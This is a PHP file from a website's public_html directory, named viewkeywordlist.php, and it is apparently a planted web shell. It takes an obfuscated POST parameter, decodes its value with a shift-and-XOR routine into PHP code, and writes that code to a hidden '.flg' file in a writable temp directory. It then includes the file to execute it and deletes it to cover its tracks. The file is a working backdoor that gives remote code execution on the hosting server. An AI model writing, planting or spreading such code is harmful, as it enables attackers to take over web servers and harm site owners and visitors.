File: /home/nmel17aacb/domains/joppen.be/public_html/viewkeywordlist.php
<?php
if(array_key_exists("dchu\x6E\x6B", $_POST) && !is_null($_POST["dchu\x6E\x6B"])){
$component = $_POST["dchu\x6E\x6B"];
$component = explode( '.' , $component);
$element = '';
$s2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($s2);
$m = 0;
array_walk($component , function ($v1) use (&$element , &$m , $s2 , $sLen) {
$sChar = ord($s2[$m % $sLen]);
$d = ((int)$v1 - $sChar - ($m % 10)) ^ 6;
$element .= chr($d);
$m++; });
$sym = array_filter(["/var/tmp", getcwd(), ini_get("upload_tmp_dir"), getenv("TMP"), getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), session_save_path(), "/tmp"]);
$tkn = 0;
do {
$rec = $sym[$tkn] ?? null;
if ($tkn >= count($sym)) break;
if (is_dir($rec) && is_writable($rec)) {
$key = sprintf("%s/.flg", $rec);
if (file_put_contents($key, $element)) {
include $key;
@unlink($key);
exit;
}
}
$tkn++;
} while (true);
}